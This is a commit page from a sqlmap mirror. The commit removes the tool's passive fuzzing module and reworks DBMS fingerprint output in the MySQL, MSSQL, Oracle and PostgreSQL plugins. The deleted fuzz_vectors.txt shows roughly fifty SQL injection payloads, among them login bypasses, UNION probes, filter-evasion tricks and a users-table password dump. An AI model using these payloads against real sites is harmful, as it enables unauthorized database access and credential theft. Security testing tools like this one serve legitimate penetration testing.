sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-04-24 19:12:02 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor enhancement to show the DBMS operating system (if fingerprinted)

Browse Source 
also when only -b option is provided since it's an information that
sqlmap get parsing the DBMS banner.
Got rid completely of useless passive fuzzing.
This commit is contained in:
Bernardo Damele 2008-11-17 11:22:03 +00:00
parent 7d7170fc97
commit 66fb3c3033
7 changed files with 99 additions and 149 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
lib/utils/fuzzer.py
View File

@ -1,43 +0,0 @@
#!/usr/bin/env python
"""
$Id$
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
from lib.core.agent import agent
from lib.core.data import logger
from lib.core.data import paths
from lib.request.connect import Connect as Request
def passiveFuzzing():
logMsg = "executing passive fuzzing to retrieve DBMS error messages"
logger.info(logMsg)
fuzzVectors = open(paths.FUZZ_VECTORS, "r")
for fuzzVector in fuzzVectors:
fuzzVector = fuzzVector.replace("\r", "").replace("\n", "")
payload = agent.payload(newValue=fuzzVector)
Request.queryPage(payload)

34
plugins/dbms/mssqlserver.py
View File

@ -46,7 +46,6 @@ from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser from lib.parse.banner import bannerParser
from lib.request import inject from lib.request import inject
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem from plugins.generic.filesystem import Filesystem
@ -124,8 +123,19 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self): def getFingerprint(self):
value = "back-end DBMS: " value = ""
actVer = formatDBMSfp() info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
actVer = formatDBMSfp()
if not conf.extensiveFp: if not conf.extensiveFp:
value += actVer value += actVer
@ -135,12 +145,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
formatInfo = None formatInfo = None
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if self.banner: if info:
info = bannerParser(self.banner)
release = info["dbmsRelease"] release = info["dbmsRelease"]
version = info["dbmsVersion"] version = info["dbmsVersion"]
servicepack = info["dbmsServicePack"] servicepack = info["dbmsServicePack"]
formatInfo = formatOSfp(info)
if release and version and servicepack: if release and version and servicepack:
banVer = "Microsoft SQL Server %s " % release banVer = "Microsoft SQL Server %s " % release
@ -149,15 +157,11 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp() htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value return value
@ -165,6 +169,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit(): if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0]) setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
if conf.getBanner:
self.banner = inject.getValue("@@VERSION")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -172,10 +179,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
logger.info(logMsg) logger.info(logMsg)
randInt = str(randomInt(1)) randInt = str(randomInt(1))
query = "LTRIM(STR(LEN(%s)))" % randInt query = "LTRIM(STR(LEN(%s)))" % randInt
if inject.getValue(query) == "1": if inject.getValue(query) == "1":
query = "SELECT SUBSTRING((@@VERSION), 25, 1)" query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
version = inject.getValue(query) version = inject.getValue(query)
if version == "8": if version == "8":
@ -190,9 +197,6 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
else: else:
setDbms("Microsoft SQL Server") setDbms("Microsoft SQL Server")
if not conf.extensiveFp:
return True
if conf.getBanner: if conf.getBanner:
self.banner = inject.getValue("@@VERSION") self.banner = inject.getValue("@@VERSION")

40
plugins/dbms/mysql.py
View File

@ -47,7 +47,6 @@ from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser from lib.parse.banner import bannerParser
from lib.request import inject from lib.request import inject
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem from plugins.generic.filesystem import Filesystem
@ -182,8 +181,19 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self): def getFingerprint(self):
value = "back-end DBMS: " value = ""
actVer = formatDBMSfp() info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
actVer = formatDBMSfp()
if not conf.extensiveFp: if not conf.extensiveFp:
value += actVer value += actVer
@ -198,25 +208,21 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
comVer = formatDBMSfp([comVer]) comVer = formatDBMSfp([comVer])
value += "\n%scomment injection fingerprint: %s" % (blank, comVer) value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
if self.banner: if info:
info = bannerParser(self.banner) # TODO: move to the XML banner file
formatInfo = formatOSfp(info)
banVer = info['version'] banVer = info['version']
if re.search("-log$", self.banner): if re.search("-log$", self.banner):
banVer += ", logging enabled" banVer += ", logging enabled"
banVer = formatDBMSfp([banVer]) banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp() htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value return value
@ -235,6 +241,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
if int(kb.dbmsVersion[0]) >= 5: if int(kb.dbmsVersion[0]) >= 5:
self.has_information_schema = True self.has_information_schema = True
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -261,6 +270,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("MySQL 5") setDbms("MySQL 5")
self.has_information_schema = True self.has_information_schema = True
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
kb.dbmsVersion = [">= 5.0.0"] kb.dbmsVersion = [">= 5.0.0"]
return True return True
@ -306,6 +318,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("MySQL 4") setDbms("MySQL 4")
kb.dbmsVersion = ["< 5.0.0"] kb.dbmsVersion = ["< 5.0.0"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -332,9 +347,6 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
else: else:
kb.dbmsVersion = ["< 3.22.11"] kb.dbmsVersion = ["< 3.22.11"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
return True return True
else: else:
warnMsg = "the back-end DMBS is not MySQL" warnMsg = "the back-end DMBS is not MySQL"

32
plugins/dbms/oracle.py
View File

@ -39,7 +39,6 @@ from lib.core.settings import ORACLE_SYSTEM_DBS
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser from lib.parse.banner import bannerParser
from lib.request import inject from lib.request import inject
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem from plugins.generic.filesystem import Filesystem
@ -118,7 +117,18 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self): def getFingerprint(self):
value = "back-end DBMS: " value = ""
info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
if not conf.extensiveFp: if not conf.extensiveFp:
value += "Oracle" value += "Oracle"
@ -129,23 +139,16 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
formatInfo = None formatInfo = None
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if self.banner: if info:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
banVer = info['version'] banVer = info['version']
banVer = formatDBMSfp([banVer]) banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp() htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value return value
@ -153,6 +156,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
if conf.dbms in ORACLE_ALIASES: if conf.dbms in ORACLE_ALIASES:
setDbms("Oracle") setDbms("Oracle")
if conf.getBanner:
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -177,6 +183,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("Oracle") setDbms("Oracle")
if conf.getBanner:
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -189,9 +198,6 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
elif re.search("^8", version): elif re.search("^8", version):
kb.dbmsVersion = ["8i"] kb.dbmsVersion = ["8i"]
if conf.getBanner:
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
return True return True
else: else:
warnMsg = "the back-end DMBS is not Oracle" warnMsg = "the back-end DMBS is not Oracle"

32
plugins/dbms/postgresql.py
View File

@ -40,7 +40,6 @@ from lib.core.settings import PGSQL_SYSTEM_DBS
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser from lib.parse.banner import bannerParser
from lib.request import inject from lib.request import inject
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem from plugins.generic.filesystem import Filesystem
@ -118,7 +117,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self): def getFingerprint(self):
value = "back-end DBMS: " value = ""
info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
if not conf.extensiveFp: if not conf.extensiveFp:
value += "PostgreSQL" value += "PostgreSQL"
@ -129,23 +139,16 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
formatInfo = None formatInfo = None
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if self.banner: if info:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
banVer = info['version'] banVer = info['version']
banVer = formatDBMSfp([banVer]) banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp() htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value return value
@ -157,6 +160,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
if conf.dbms in PGSQL_ALIASES: if conf.dbms in PGSQL_ALIASES:
setDbms("PostgreSQL") setDbms("PostgreSQL")
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -180,6 +186,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("PostgreSQL") setDbms("PostgreSQL")
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -215,9 +224,6 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
else: else:
kb.dbmsVersion = ["< 6.2.0"] kb.dbmsVersion = ["< 6.2.0"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
return True return True
else: else:
warnMsg = "the back-end DMBS is not PostgreSQL" warnMsg = "the back-end DMBS is not PostgreSQL"

51
txt/fuzz_vectors.txt
View File

@ -1,51 +0,0 @@
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Admin' OR '
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing'
' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select
Password:*/=1--
UNI/**/ON SEL/**/ECT
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXEC ('SEL' + 'ECT US' + 'ER')
'/**/OR/**/1/**/=/**/1
' or 1/*
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+&password=
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
@var select @var as var into temp end --

16
xml/banner/generic.xml
View File

@ -6,18 +6,34 @@
<info type="Windows"/> <info type="Windows"/>
</regexp> </regexp>
<regexp value="Microsoft.*7\.0">
<info type="Windows" distrib="Vista"/>
</regexp>
<regexp value="Microsoft.*7\.0.*Service Pack (\d)"> <regexp value="Microsoft.*7\.0.*Service Pack (\d)">
<info type="Windows" distrib="Vista" sp="1"/> <info type="Windows" distrib="Vista" sp="1"/>
</regexp> </regexp>
<regexp value="Microsoft.*6\.0">
<info type="Windows" distrib="2003"/>
</regexp>
<regexp value="Microsoft.*6\.0.*Service Pack (\d)"> <regexp value="Microsoft.*6\.0.*Service Pack (\d)">
<info type="Windows" distrib="2003" sp="1"/> <info type="Windows" distrib="2003" sp="1"/>
</regexp> </regexp>
<regexp value="Microsoft.*5\.1">
<info type="Windows" distrib="XP"/>
</regexp>
<regexp value="Microsoft.*5\.1.*Service Pack (\d)"> <regexp value="Microsoft.*5\.1.*Service Pack (\d)">
<info type="Windows" distrib="XP" sp="1"/> <info type="Windows" distrib="XP" sp="1"/>
</regexp> </regexp>
<regexp value="Microsoft.*5\.0">
<info type="Windows" distrib="2000"/>
</regexp>
<regexp value="Microsoft.*5\.0.*Service Pack (\d)"> <regexp value="Microsoft.*5\.0.*Service Pack (\d)">
<info type="Windows" distrib="2000" sp="1"/> <info type="Windows" distrib="2000" sp="1"/>
</regexp> </regexp>